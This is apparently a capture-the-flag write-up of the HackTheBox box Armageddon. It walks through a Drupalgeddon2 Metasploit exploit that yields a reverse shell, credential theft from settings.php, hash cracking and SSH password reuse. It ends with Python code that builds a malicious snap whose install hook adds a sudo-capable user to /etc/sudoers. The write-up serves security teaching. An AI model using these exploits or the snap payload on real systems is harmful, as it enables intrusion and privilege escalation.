

h3xu


Enumeration
Service Scan
The service scan reveals two open ports: SSH and an Apache web server. The http-generator header identifies the site as Drupal 7, which already gives us a direction, and robots.txt lists directories and files worth checking (CHANGELOG.txt in particular will confirm the exact version).

# nmap -sC -sV -p-65535 armageddon                                                                           
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-08 04:58 EDT
Nmap scan report for armageddon (10.10.10.233)
Host is up (0.050s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
|   256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_  256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to  Armageddon |  Armageddon

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.82 seconds

Droopescan
I searched for Drupal scanners and found droopescan on GitHub. It confirms the version (7.56) and enumerates the enabled modules and themes.
 

# ./droopescan scan drupal -u http://armageddon
[+] Plugins found:                                                              
    profile http://armageddon/modules/profile/
    php http://armageddon/modules/php/
    image http://armageddon/modules/image/

[+] Themes found:
    seven http://armageddon/themes/seven/
    garland http://armageddon/themes/garland/

[+] Possible version(s):
    7.56

[+] Possible interesting urls found:
    Default changelog file - http://armageddon/CHANGELOG.txt

[+] Scan finished (0:01:07.454052 elapsed)

Searchsploit
Further searches for exploits that apply to 7.56 led me to Drupalgeddon, which I try out in the next stage.

 

$ searchsploit drupal                    
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                      |  Path
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
Drupal 4.0 - News Message HTML Injection                                                                            | php/webapps/21863.txt
Drupal 4.1/4.2 - Cross-Site Scripting                                                                               | php/webapps/22940.txt
Drupal 4.5.3 < 4.6.1 - Comments PHP Injection                                                                       | php/webapps/1088.pl
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution                                                         | php/webapps/1821.php
Drupal 4.x - URL-Encoded Input HTML Injection                                                                       | php/webapps/27020.txt
Drupal 5.2 - PHP Zend Hash ation Vector                                                                             | php/webapps/4510.txt
Drupal 5.21/6.16 - Denial of Service                                                                                | php/dos/10826.sh
Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities                                              | php/webapps/11060.txt
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)                                                   | php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)                                                    | php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)                                         | php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)                                         | php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)                                            | php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities                                                                              | php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution                                                                  | php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution                                                             | php/webapps/3313.pl
Drupal < 5.1 - Post Comments Remote Command Execution                                                               | php/webapps/3312.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities                                                                       | php/webapps/33706.txt
Drupal < 7.34 - Denial of Service                                                                                   | php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)                                            | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)                                         | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution                                 | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)                             | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)                                    | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)               | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution                                                      | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution                                                                  | php/webapps/46459.py
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure                                                   | php/webapps/44501.txt
Drupal Module Ajax Checklist 5.x-1.0 - Multiple SQL Injections                                                      | php/webapps/32415.txt
Drupal Module CAPTCHA - Security Bypass                                                                             | php/webapps/35335.html
Drupal Module CKEditor 3.0 < 3.6.2 - Persistent EventHandler Cross-Site Scripting                                   | php/webapps/18389.txt
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting                              | php/webapps/25493.txt
Drupal Module CODER 2.5 - Remote Command Execution (Metasploit)                                                     | php/webapps/40149.rb
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution                                                       | php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting                                             | php/webapps/35397.txt
Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload                                      | php/webapps/37453.php
Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple Vulnerabilities        | php/webapps/35072.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)                                                   | php/remote/40130.rb
Drupal Module Sections - Cross-Site Scripting                                                                       | php/webapps/10485.txt
Drupal Module Sections 5.x-1.2/6.x-1.2 - HTML Injection                                                             | php/webapps/33410.txt
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Exploit
Metasploit Drupalgeddon2

Drupalgeddon2 (CVE-2018-7600) is an unauthenticated remote code execution bug in Drupal's Form API: user-controlled input is merged into a render array, so attributes such as #post_render can be injected and made to call a PHP function. The searchsploit list shows it affects 7.x below 7.58 and droopescan reported 7.56, so the Metasploit module unix/webapp/drupal_drupalgeddon2 is the obvious choice. With RHOSTS set to the target and LHOST to the attacker's VPN address, its automatic check confirms the target is vulnerable and returns a PHP Meterpreter session inside the web server process.
 

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

[*] Started reverse TCP handler on 10.10.14.6:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Sending stage (39282 bytes) to 10.10.10.233
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.233:41324) at 2021-06-08 06:09:47 -0400
meterpreter > sysinfo                                                                                                                                 
Computer    : armageddon.htb                                                                                                                          
OS          : Linux armageddon.htb 3.10.0-1160.6.1.el7.x86_64 #1 SMP Tue Nov 17 13:59:11 UTC 2020 x86_64                                              
Meterpreter : php/linux

 

There are several directories under /var/www/html. Going through the files, I found a config file, sites/default/settings.php, which contains a database username and password. I also uploaded some privesc tools (unix-privesc-check and LinEnum) through Meterpreter's upload function. Note that dropping them into the web root makes them reachable over HTTP, which is fine on a lab box but worth avoiding on a real engagement.

 

ls
authorize.php  cron.php   INSTALL.mysql.txt  INSTALL.sqlite.txt  linenum.sh       modules   README.txt  sites               update.php     web.config
CHANGELOG.txt  includes   INSTALL.pgsql.txt  INSTALL.txt         MAINTAINERS.txt  out.txt   robots.txt  themes              UPGRADE.txt    xmlrpc.php
COPYRIGHT.txt  index.php  install.php        LICENSE.txt         misc             profiles  scripts     unix-privesc-check

 

cat sites/default/settings.php
<deleted>
$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'CQHEy@9M*m23gBVj',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
<deleted>


Next, I use the credentials to log in to the Drupal database and enumerate its tables, then dump the users table from the 'drupal' database. The dump contains the password hash for *brucetherealadmin*.

mysql -u drupaluser -p -D drupal -e 'show tables;'

<deleted> 

users

<deleted>

mysqldump -u drupaluser -p drupal users > usersdump.sql

cat usersdump.sql

<deleted>
(1,'brucetherealadmin','$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt','[email protected]','','','filtered_html',1606998756,1607077194,1607076276,1,'Europe/London','',0,'[email protected]','a:1:{s:7:\"overlay\";i:1;}'),
<deleted>

Cracking the hash with john was easy and straightforward: the $S$ prefix marks Drupal 7's SHA-512 variant of phpass, which john supports as the drupal7 format, and the password is in rockyou.

john --format=drupal7 --wordlist=/usr/share/wordlists/rockyou.txt forjohn

$ cat /home/kali/.john/john.pot
$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt:booboo

 

Log in to the web application with the credentials.

I remembered that an SSH service is running, so I tried the same password there, and it is reused.

# ssh brucetherealadmin@10.10.10.233
The authenticity of host '10.10.10.233 (10.10.10.233)' can't be established.
ECDSA key fingerprint is SHA256:bC1R/FE5sI72ndY92lFyZQt4g1VJoSNKOeAkuuRr4Ao.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.233' (ECDSA) to the list of known hosts.
brucetherealadmin@10.10.10.233's password: 
Last login: Fri Mar 19 08:01:19 2021 from 10.10.14.5
[brucetherealadmin@armageddon ~]$ 

 

Checking sudo rights, I discovered that brucetherealadmin may run the *snap* binary as root without a password, but only as `snap install` followed by any arguments.

[brucetherealadmin@armageddon ~]$ sudo -l
Matching Defaults entries for brucetherealadmin on armageddon:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
    LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
    LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User brucetherealadmin may run the following commands on armageddon:
    (root) NOPASSWD: /usr/bin/snap install *

 

A little research on snap points to GTFOBins and to dirty_sock:
1. Tried https://gtfobins.github.io/gtfobins/snap/ but it did not work.
2. A bit of additional research reveals https://github.com/initstring/dirty_sock

I followed the steps from '2' and it did not work either. The Python version seemed to be the problem, so I copied the exploit's source code into a new file and ran it with the correct Python version.

 

Finally, I was able to root the box by installing the exploit's snap, which created a user dirty_sock:dirty_sock with sudo rights and therefore root access. The box is quite interesting, and it was nice to learn something new, such as the snap vulnerability and ways to exploit it. All in all, a pretty fun box.
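The hash that john cracked above deserves a closer look. The following is an added example for this page, not code from the original post or from Drupal: it ports Drupal 7's _password_crypt()/user_check_password() to Python so you can see what the cracker is actually paying per guess. The work factor is encoded in the fourth character of the hash ('D' means 2^15 rounds of plain SHA-512 with no memory hardness), which is why a rockyou run finishes quickly. BRUCE_HASH is the value from the users table dump; the "booboo" check reproduces john's result.

```python
"""Verify a Drupal 7 '$S$' password hash in pure Python.

Added example for this page, not code from the original post or from
Drupal. It ports Drupal 7's _password_crypt()/user_check_password() so
the reader can see what john was attacking: the iteration count is
encoded in character 4 of the hash, and 7.x uses 2^15 rounds of plain
SHA-512 (no memory hardness), so a rockyou wordlist runs fast.
"""
import hashlib
import math
from typing import Optional

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
DRUPAL_HASH_LENGTH = 55          # Drupal 7 keeps only the first 55 chars
DRUPAL_MIN_HASH_COUNT = 7
DRUPAL_MAX_HASH_COUNT = 30

# The brucetherealadmin hash from the users table dump in the post.
BRUCE_HASH = "$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt"


def _password_base64_encode(data: bytes) -> str:
    """phpass-style base64 (little-endian, custom alphabet, no padding)."""
    count = len(data)
    out = []
    i = 0
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def password_crypt(password: str, setting: str, algo: str = "sha512") -> Optional[str]:
    """Port of Drupal 7 _password_crypt(): returns the stored form or None."""
    setting = setting[:12]                      # "$S$" + count char + 8-char salt
    if len(setting) != 12 or setting[0] != "$" or setting[2] != "$":
        return None
    count_log2 = ITOA64.find(setting[3])        # -1 if the char is not in the alphabet
    if count_log2 < DRUPAL_MIN_HASH_COUNT or count_log2 > DRUPAL_MAX_HASH_COUNT:
        return None
    salt = setting[4:12]
    pw = password.encode("utf-8")
    digest = hashlib.new(algo, salt.encode("ascii") + pw).digest()
    for _ in range(1 << count_log2):            # PHP: do { ... } while (--$count)
        digest = hashlib.new(algo, digest + pw).digest()
    output = setting + _password_base64_encode(digest)
    expected = 12 + math.ceil(8 * len(digest) / 6)
    return output[:DRUPAL_HASH_LENGTH] if len(output) == expected else None


def check_password(password: str, stored_hash: str) -> bool:
    """Drupal 7 user_check_password() for the '$S$' (SHA-512) hash type."""
    if not stored_hash.startswith("$S$"):
        return False
    candidate = password_crypt(password, stored_hash)
    return candidate is not None and candidate == stored_hash


def iteration_count(stored_hash: str) -> int:
    """SHA-512 rounds a cracker pays per guess: 2^(alphabet index of char 4)."""
    return 1 << ITOA64.find(stored_hash[3])


def hash_password(password: str, salt: str, count_log2: int = 15) -> Optional[str]:
    """Make a new hash; salt is 8 chars from ITOA64 (Drupal draws them randomly)."""
    if len(salt) != 8 or any(c not in ITOA64 for c in salt):
        raise ValueError("salt must be 8 characters from the phpass alphabet")
    return password_crypt(password, "$S$" + ITOA64[count_log2] + salt)


if __name__ == "__main__":
    print(iteration_count(BRUCE_HASH))           # 32768
    print(check_password("booboo", BRUCE_HASH))  # True
```

The same code also shows the defensive side: raising count_log2 in hash_password (Drupal's DRUPAL_HASH_COUNT setting) makes every guess proportionally more expensive, but the real fix for a password like "booboo" is a password policy, not a bigger exponent.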
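To make the privilege escalation step concrete: the sudo rule `(root) NOPASSWD: /usr/bin/snap install *` is abusable because a snap's meta/hooks/install script runs as root while snapd installs the package, and the trailing `*` lets the user pass `--dangerous --devmode` plus any local .snap file, so no signature and no confinement apply. The following is an added example for this page, not the post's own code and not the dirty_sock repository's: it builds the snap directory layout by hand (the GTFOBins entry does the same thing with fpm) with an install hook that creates the dirty_sock user, and packs it with mksquashfs when that tool is available. The user name, password and snap metadata are the example's own choices.

```python
"""Build the kind of snap that turns 'sudo snap install *' into root.

Added example for this page; it is neither the post's own code nor the
dirty_sock repository's. A snap's meta/hooks/install script runs as root
while snapd installs the package, and --devmode removes confinement, so
the hook can add a user. The sudo rule's trailing '*' is what lets the
low-privileged user pass --dangerous --devmode and a local .snap file.
Assumes: squashfs-tools (mksquashfs) on the build host if you want the
packed .snap; the user/password 'dirty_sock' mirror the post's outcome.
"""
import shutil
import subprocess
import tempfile
from pathlib import Path
from typing import List, Optional

# Minimal snap metadata; 'confinement: devmode' matches the --devmode
# flag given at install time. Name and version are this example's choice.
SNAP_YAML = """\
name: dirty-sock
version: '0.1'
summary: empty snap with a root install hook
description: added example for the sudo snap install privesc
architectures:
  - amd64
confinement: devmode
grade: devel
"""

# Payload that snapd runs once as root. The user name and password are
# the example's own choice; chpasswd avoids needing a precomputed hash.
INSTALL_HOOK = """\
#!/bin/sh
useradd -m -s /bin/bash dirty_sock
echo 'dirty_sock:dirty_sock' | chpasswd
echo 'dirty_sock ALL=(ALL:ALL) ALL' >> /etc/sudoers
"""


def build_snap_tree(root: Path) -> Path:
    """Write meta/snap.yaml and an executable meta/hooks/install under root."""
    hooks = root / "meta" / "hooks"
    hooks.mkdir(parents=True, exist_ok=True)
    (root / "meta" / "snap.yaml").write_text(SNAP_YAML)
    hook = hooks / "install"
    hook.write_text(INSTALL_HOOK)
    hook.chmod(0o755)          # snapd only runs hooks that are executable
    return hook


def build_in_tempdir() -> Path:
    """Convenience: build the tree in a fresh temp dir and return the hook path."""
    return build_snap_tree(Path(tempfile.mkdtemp(prefix="dirty_snap_")))


def pack_snap(root: Path, out: Path) -> Optional[Path]:
    """Squash the tree into a .snap; returns None if mksquashfs is missing."""
    if shutil.which("mksquashfs") is None:
        return None
    subprocess.run(
        ["mksquashfs", str(root), str(out), "-noappend", "-comp", "xz", "-all-root"],
        check=True, stdout=subprocess.DEVNULL,
    )
    return out


def install_command(snap_file: Path) -> List[str]:
    """The argv that the rule '(root) NOPASSWD: /usr/bin/snap install *' permits."""
    return ["sudo", "/usr/bin/snap", "install", "--dangerous", "--devmode", str(snap_file)]


if __name__ == "__main__":
    hook = build_in_tempdir()
    tree = hook.parent.parent.parent
    packed = pack_snap(tree, tree / "dirty_sock.snap")
    print("hook written to", hook)
    print("run on the target:", " ".join(install_command(packed or tree / "dirty_sock.snap")))
```

The defensive reading is the same as GTFOBins' general rule: a sudo rule whose command ends in `*` grants every flag the binary understands, so `snap install *` should be treated as `ALL`. Restricting it to a fixed snap name from the store (no `--dangerous`) would close this path.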

 
